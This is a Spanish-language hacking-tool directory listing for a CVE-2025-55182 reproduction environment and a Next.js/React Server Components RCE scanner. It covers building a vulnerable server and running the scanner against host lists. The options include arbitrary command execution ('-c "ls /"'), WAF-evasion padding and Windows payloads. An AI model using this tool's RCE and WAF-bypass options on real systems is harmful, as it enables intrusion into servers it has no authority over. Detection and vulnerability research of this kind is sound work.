Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2025-55182 — Entorno de reproducción de CVE-2025-55182 y PoC de eco RCE | Kitploit
Herramientas/GitHubGitHub/zzhorc/cve-2025-55182
Escáneres de VulnerabilidadesGeneración de PayloadsExplotaciónExplotación de Aplicaciones WebEvasión de WAFSeguridad WebPruebas de Penetración
GitHubzzhorc/cve-2025-55182

CVE-2025-55182

Entorno de reproducción de CVE-2025-55182 y PoC de eco RCE

Ver Repositorio
726hace 9 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

Versiones afectadas

Descargar herramienta
ComponenteVersión recomendada para la reproducciónRango de versiones vulnerables
Node.js>= 20.9.020.9.0 (LTS) y superiores
Next.js15.0.015.x, 16.x(App Router)
React Core19.0.0 o 19.2.019.0.0 a 19.2.0
RSC Bundlerreact-server-dom-webpack19.0.0 a 19.2.0

Compilación e inicio

  1. Forzar la instalación de una versión anterior

    root@kitploit:~
    cd cve-2025-55182-target
    npm install --force
    
  2. Verificar las versiones de las dependencias

    root@kitploit:~
    npm list react next
    # 确认输出显示 [email protected] 和 [email protected]
    

    Siempre que la lista de dependencias de nivel superior muestre [email protected] y [email protected], el entorno quedará correctamente fijado en el estado vulnerable; puede ignorar las advertencias y los códigos de error que aparezcan aquí.

  3. Compilar:

    root@kitploit:~
    npm run build
    
  4. Ejecutar:

    root@kitploit:~
    npm start
    

    El servidor estará a la escucha en http://localhost:3000. Una vez completada la configuración del entorno, puede comenzar la verificación de la vulnerabilidad.

Ejemplo

  • Detección de vulnerabilidades / escaneo:

    root@kitploit:~
    cd React2shell
    python3.11 scanner.py -u http://127.0.0.1:3000/
    
  • RCE:

    root@kitploit:~
    python3.11 scanner_with_rce.py -u http://127.0.0.1:3000/ -c "ls /"
    

    rce

poc

Referencias

react2shell-scanner

react2shell-scanner

Una herramienta de línea de comandos para detectar CVE-2025-55182 y CVE-2025-66478 en aplicaciones Next.js que utilizan React Server Components.

Para obtener detalles técnicos sobre la vulnerabilidad y la metodología de detección, consulte nuestra publicación en el blog: https://slcyber.io/research-center/high-fidelity-detection-mechanism-for-rsc-next-js-rce-cve-2025-55182-cve-2025-66478

Cómo funciona

Por defecto, el escáner envía una solicitud POST multipart manipulada que contiene un payload de prueba de concepto (PoC) de RCE que ejecuta una operación matemática determinista (41*271 = 11111). Los hosts vulnerables devuelven el resultado en la cabecera de respuesta X-Action-Redirect como /login?a=11111.

El escáner prueba primero la ruta raíz. Si no es vulnerable, sigue las redirecciones del mismo host (p. ej., de / a /en/) y prueba el destino de la redirección. Las redirecciones entre orígenes no se siguen.

Modo de comprobación segura

La opción --safe-check utiliza un método de detección alternativo que se basa en indicadores de canal lateral (código de estado 500 con un digest de error específico) sin ejecutar código en el objetivo. Use este modo cuando no se desee ejecutar RCE.

Evasión de WAF

La opción --waf-bypass antepone datos aleatorios al cuerpo de la solicitud multipart. Esto puede ayudar a evadir la inspección de contenido del WAF que solo analiza la primera parte del cuerpo de la solicitud. El tamaño predeterminado es de 128KB, configurable mediante --waf-bypass-size. Cuando la evasión de WAF está habilitada, el tiempo de espera (timeout) se aumenta automáticamente a 20 segundos (a menos que se establezca explícitamente).

Modo Windows

La opción --windows cambia el payload de la shell de Unix (echo $((41*271))) a PowerShell (powershell -c "41*271") para objetivos que se ejecutan en Windows.

Requisitos

  • Python 3.9+
  • requests
  • tqdm

Instalación

root@kitploit:~
pip install -r requirements.txt

Uso

Escanear un solo host:

root@kitploit:~
python3 scanner.py -u https://example.com

Escanear una lista de hosts:

root@kitploit:~
python3 scanner.py -l hosts.txt

Escanear con varios hilos y guardar los resultados:

root@kitploit:~
python3 scanner.py -l hosts.txt -t 20 -o results.json

Escanear con cabeceras personalizadas:

root@kitploit:~
python3 scanner.py -u https://example.com -H "Authorization: Bearer token" -H "Cookie: session=abc"

Usar la detección segura por canal lateral:

root@kitploit:~
python3 scanner.py -u https://example.com --safe-check

Escanear objetivos Windows:

root@kitploit:~
python3 scanner.py -u https://example.com --windows

Escanear con evasión de WAF:

root@kitploit:~
python3 scanner.py -u https://example.com --waf-bypass

RCE

root@kitploit:~
python3 scanner.py -u https://example.com -c "ls /"

Opciones

root@kitploit:~
-u, --url         Single URL to check
-c, --cmd         Command to execute
-l, --list        File containing hosts (one per line)
-t, --threads     Number of concurrent threads (default: 10)
--timeout         Request timeout in seconds (default: 10)
-o, --output      Output file for results (JSON)
--all-results     Save all results, not just vulnerable hosts
-k, --insecure    Disable SSL certificate verification
-H, --header      Custom header (can be used multiple times)
-v, --verbose     Show response details for vulnerable hosts
-q, --quiet       Only output vulnerable hosts
--no-color        Disable colored output
--safe-check      Use safe side-channel detection instead of RCE PoC
--windows         Use Windows PowerShell payload instead of Unix shell
--waf-bypass      Add junk data to bypass WAF content inspection
--waf-bypass-size Size of junk data in KB (default: 128)

Créditos

El PoC de RCE fue divulgado originalmente por @maple3142 -- estamos increíblemente agradecidos por su trabajo al publicar un PoC funcional.

Esta herramienta se creó originalmente como una forma segura de detectar el RCE. Esta funcionalidad sigue disponible mediante --safe-check, el modo de "detección segura".

  • Assetnote Security Research Team - Adam Kues, Tomais Williamson, Dylan Pindur, Patrik Grobshäuser, Shubham Shah
  • xEHLE_ - Reflexión de la salida de RCE en la cabecera de respuesta
  • Nagli

Salida

Los resultados se imprimen en la terminal. Al usar -o, los hosts vulnerables se guardan en un archivo JSON que contiene la solicitud y la respuesta HTTP completas para su verificación.